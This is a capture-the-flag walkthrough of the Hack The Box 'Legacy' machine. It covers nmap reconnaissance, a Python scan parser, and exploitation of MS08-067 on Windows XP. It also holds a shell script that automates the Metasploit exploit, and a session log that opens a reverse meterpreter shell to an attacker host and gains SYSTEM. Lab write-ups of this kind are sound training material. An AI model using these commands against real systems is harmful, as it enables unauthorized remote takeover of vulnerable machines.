Hack The Box: Legacy Walkthrough

By Kevin Kirsche, December 6, 2017, in Walkthrough

Information About Our Target

  • Hostname: Legacy
  • IP Address: 10.10.10.4
  • Operating System Family: Windows

Abstract / Overview

The SMB service on this machine is vulnerable to MS08-067, a pre-authentication stack buffer overflow in the Windows Server service, which lets us execute arbitrary code as SYSTEM with a single exploit and no privilege escalation step.

Information Gathering

Port Scan

1. Surface Scan

We begin with a quick SYN scan (-sS) of nmap's top 1000 TCP ports, running only the banner-grabbing NSE script, and with --reason so nmap tells us why it classified each port the way it did.

Output:


# Nmap 7.60 scan initiated Wed Dec 6 09:39:46 2017 as: nmap -sS -T4 -oA 01-tcp-top1k/top-1k --stats-every 60s --max-retries 3 --top-ports 1000 --script banner --reason 10.10.10.4
Nmap scan report for 10.10.10.4
Host is up, received echo-reply ttl 127 (0.023s latency).
Not shown: 997 filtered ports
Reason: 997 no-responses
PORT STATE SERVICE REASON
139/tcp open netbios-ssn syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
3389/tcp closed ms-wbt-server reset ttl 127

# Nmap done at Wed Dec 6 09:40:06 2017 -- 1 IP address (1 host up) scanned in 19.93 seconds

Hm, not much here. SMB is exposed on TCP 139 and 445, and the remote desktop protocol (RDP) port, TCP 3389, is closed rather than filtered: the host answered with a RST, so its TCP stack is reachable even though nothing is listening there. Everything points at Windows: the NetBIOS session service on 139 is a Windows fingerprint, RDP is far more common on Windows than on Linux (where you'd usually find VNC instead), and every reply carries TTL 127, one below the Windows default initial TTL of 128, which is consistent with a Windows host one hop away (Linux defaults to 64).

2. Deep Scan

Since we have an idea of what the host is running, we can now run a more thorough scan: all 65535 TCP ports (-p-) with service and version detection (-sV). This takes much longer (about 21 minutes here, because almost every port is filtered and each probe has to time out), but it gives us significantly more information to work with.


# Nmap 7.60 scan initiated Wed Dec 6 09:40:06 2017 as: nmap -sS -T4 -sV -oA 02-tcp-full/full-tcp --stats-every 60s --max-retries 3 -p- --reason 10.10.10.4
Nmap scan report for 10.10.10.4
Host is up, received echo-reply ttl 127 (0.038s latency).
Not shown: 65532 filtered ports
Reason: 65532 no-responses
PORT STATE SERVICE REASON VERSION
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows XP microsoft-ds
3389/tcp closed ms-wbt-server reset ttl 127
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 6 10:00:54 2017 -- 1 IP address (1 host up) scanned in 1248.59 seconds

Hm, we didn't get all that much from this. No new ports, but -sV's SMB fingerprint (see the Service Info line) tells us this is a Windows XP machine, which narrows the exploit search considerably.
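The two scans above are read by hand, but the same reasoning (which ports answered, what the RST on 3389 means, and what a TTL of 127 says about the OS) is easy to automate. The following is an added example, not part of the original walkthrough: a small parser for nmap's normal output format that pulls out the port table and host TTL, guesses the OS family from the TTL, and diffs the full scan against the surface scan to confirm nothing new appeared. The sample input is the walkthrough's own scan output, trimmed to the lines the parser reads; the TTL-to-OS table is a heuristic that NAT, proxies and hardened hosts can defeat.

```python
"""Parse nmap normal-format output, summarize what answered, and turn the
observed TTL into an OS guess. Added example, not from the walkthrough."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample input: the two reports from the walkthrough, trimmed.
SURFACE_SCAN = """\
Nmap scan report for 10.10.10.4
Host is up, received echo-reply ttl 127 (0.023s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE REASON
139/tcp open netbios-ssn syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
3389/tcp closed ms-wbt-server reset ttl 127
"""

FULL_SCAN = """\
Nmap scan report for 10.10.10.4
Host is up, received echo-reply ttl 127 (0.038s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE REASON VERSION
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows XP microsoft-ds
3389/tcp closed ms-wbt-server reset ttl 127
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
"""

# One port line, e.g. "445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows XP microsoft-ds"
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s+(?P<reason>\S+)"
    r"(?:\s+ttl\s+(?P<ttl>\d+))?(?:\s+(?P<version>.+))?$"
)
TTL_RE = re.compile(r"\bttl\s+(\d+)\b")

# Initial TTLs common stacks put on outgoing packets. The observed TTL is the
# initial value minus the hop count, so 127 reads as "128 minus one hop".
DEFAULT_TTLS = {64: "Linux/BSD/macOS", 128: "Windows", 255: "Solaris/Cisco/network device"}


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    reason: str
    ttl: Optional[int]
    version: str


@dataclass
class Report:
    host: str = ""
    host_ttl: Optional[int] = None
    ports: List[Port] = field(default_factory=list)

    def open_ports(self) -> List[Port]:
        return [p for p in self.ports if p.state == "open"]

    def responsive_closed(self) -> List[Port]:
        # "closed" with reason "reset" means the host's TCP stack sent a RST:
        # the host is there, but nothing listens on that port.
        return [p for p in self.ports if p.state == "closed" and p.reason == "reset"]


def parse_nmap(text: str) -> Report:
    """Extract host, host TTL and the port table from nmap normal output."""
    report = Report()
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Nmap scan report for "):
            report.host = line[len("Nmap scan report for "):]
        elif line.startswith("Host is up"):
            m = TTL_RE.search(line)
            report.host_ttl = int(m.group(1)) if m else None
        else:
            m = PORT_RE.match(line)
            if m:
                report.ports.append(Port(
                    number=int(m["port"]), proto=m["proto"], state=m["state"],
                    service=m["service"], reason=m["reason"],
                    ttl=int(m["ttl"]) if m["ttl"] else None,
                    version=(m["version"] or "").strip(),
                ))
    return report


def guess_os_from_ttl(ttl: Optional[int]) -> Tuple[Optional[str], Optional[int]]:
    """Return (OS family, estimated hop count) for an observed TTL, or (None, None).
    Heuristic only: NAT, proxies and hardened hosts can rewrite the TTL."""
    if ttl is None or ttl < 1 or ttl > 255:
        return None, None
    initial = min(t for t in DEFAULT_TTLS if t >= ttl)  # nearest default at or above observed
    return DEFAULT_TTLS[initial], initial - ttl


def new_ports(baseline: Report, full: Report) -> List[Port]:
    """Ports in the full scan that the surface scan did not already show."""
    seen = {(p.number, p.proto) for p in baseline.ports}
    return [p for p in full.ports if (p.number, p.proto) not in seen]


def summarize(report: Report) -> str:
    os_family, hops = guess_os_from_ttl(report.host_ttl)
    lines = [f"{report.host}: ttl {report.host_ttl} -> {os_family} (~{hops} hop(s))"]
    for p in report.open_ports():
        lines.append(f"  open   {p.number}/{p.proto} {p.service} {p.version}".rstrip())
    for p in report.responsive_closed():
        lines.append(f"  closed {p.number}/{p.proto} {p.service} (RST: host answered, port not listening)")
    return "\n".join(lines)


if __name__ == "__main__":
    surface, full = parse_nmap(SURFACE_SCAN), parse_nmap(FULL_SCAN)
    print(summarize(full))
    extra = new_ports(surface, full)
    print("new ports in full scan:", [f"{p.number}/{p.proto}" for p in extra] or "none")
```

Run it against your own -oN files by replacing the embedded strings with the file contents; the parser ignores the header, "Not shown" and "Service Info" lines, so the unmodified nmap output works as input.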

Services

So based on this we know a lot more about the host, and it appears to be running:

  • SMB / CIFS (TCP 139 and 445), served by Windows' native Server service (microsoft-ds), not Samba, which is the Unix implementation

Exploitation

Since we know this is a Windows XP machine with SMB exposed, we should try our hand at one of the most pervasive SMB vulnerabilities that ever hit Windows XP: MS08-067, a pre-authentication stack buffer overflow in the Server service's path canonicalization code (NetprPathCanonicalize in netapi32.dll), reachable over SMB and patched by KB958644 in October 2008. An unpatched XP SP3 box exposing TCP 445 is exactly the target it was written for.

Details on this exploit: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067
Exploit itself: https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi
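Before firing the exploit it is worth confirming the bug is actually present: MS08-067 is a stack overflow, and a wrong target selection can crash the Server service instead of giving a shell. The script below is an added example, not the walkthrough's own steps. It assumes nmap and msfconsole are on the PATH, uses the same target, LHOST and LPORT as the session that follows, and defaults to a dry run that only shows the commands (set MS08_RUN=1 to actually run the check and, if the host is reported vulnerable, the exploit).

```shell
#!/bin/sh
# MS08-067 pre-flight check and repeatable exploitation.
# Added example, not from the walkthrough; assumes nmap and msfconsole are installed.
TARGET="${TARGET:-10.10.10.4}"
LHOST="${LHOST:-10.10.14.5}"
LPORT="${LPORT:-443}"

# nmap's smb-vuln-ms08-067 script asks the Server service whether it still has the bug,
# so we only throw a memory-corruption exploit at hosts that are actually vulnerable.
ms08_067_check_cmd() {
    printf 'nmap -p445 --script smb-vuln-ms08-067 %s\n' "$1"
}

# Metasploit resource script: same module, options and payload as the session below.
# Current Metasploit takes RHOSTS (older releases, as in the 2017 session, used RHOST).
# LPORT 443 is used because a reverse connection to 443 looks like HTTPS to egress filtering.
write_msf_rc() {
    cat > "$1" <<EOF
use exploit/windows/smb/ms08_067_netapi
set RHOSTS $TARGET
set LHOST $LHOST
set LPORT $LPORT
set PAYLOAD windows/meterpreter/reverse_tcp
exploit -j
EOF
}

# Gate: succeeds only if nmap's vulns output reports the host as VULNERABLE
# (matching "State: VULNERABLE" avoids a false hit on "NOT VULNERABLE").
is_vulnerable() {
    eval "$(ms08_067_check_cmd "$1")" 2>/dev/null | grep -qE 'State: (LIKELY )?VULNERABLE'
}

main() {
    rc="$(mktemp /tmp/ms08_067.XXXXXX)"
    write_msf_rc "$rc"
    if [ "${MS08_RUN:-0}" != "1" ]; then
        # Dry run (default): show what would be executed and the resource file.
        echo "would run: $(ms08_067_check_cmd "$TARGET")"
        echo "then, if vulnerable: msfconsole -q -r $rc"
        cat "$rc"
        return 0
    fi
    if is_vulnerable "$TARGET"; then
        # Once the session is up: sessions -i 1, then getuid should report NT AUTHORITY\SYSTEM.
        msfconsole -q -r "$rc"
    else
        echo "$TARGET not reported vulnerable to MS08-067; not exploiting" >&2
        return 1
    fi
}

main "$@"
```

Keeping the module options in a resource file makes the attempt reproducible and keeps the pre-check in front of the exploit, which matters on a shared lab box where a crashed Server service means waiting for a reset.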

So let's try it out.


msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 10.10.10.4
RHOST => 10.10.10.4
msf exploit(ms08_067_netapi) > set LHOST 10.10.14.5
LHOST => 10.10.14.5
msf exploit(ms08_067_netapi) > set LPORT 443
LPORT => 443
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 10.10.14.5:443
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179267 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.5:443 -> 10.10.10.4:1029) at 2017-12-06 10:35:17 -0500
meterpreter > sysinfo
Computer : LEGACY
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > shell
Process 1136 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>echo %username%
echo %username%
LEGACY$

Perfect! %username% comes back as LEGACY$, the computer account: that is what a process running as NT AUTHORITY\SYSTEM reports, because SYSTEM presents itself on the network as the machine account (machine account names end in $). Meterpreter's getuid confirms it as NT AUTHORITY\SYSTEM. Since we already have SYSTEM there is no privilege escalation step; we can dump the user and root proofs right away.

Author Kevin Kirsche

Kevin is a Principal Security Architect with Verizon. He holds the OSCP, OSWP, OSCE, and SLAE certifications. He is interested in learning more about building exploits and advanced penetration testing concepts.
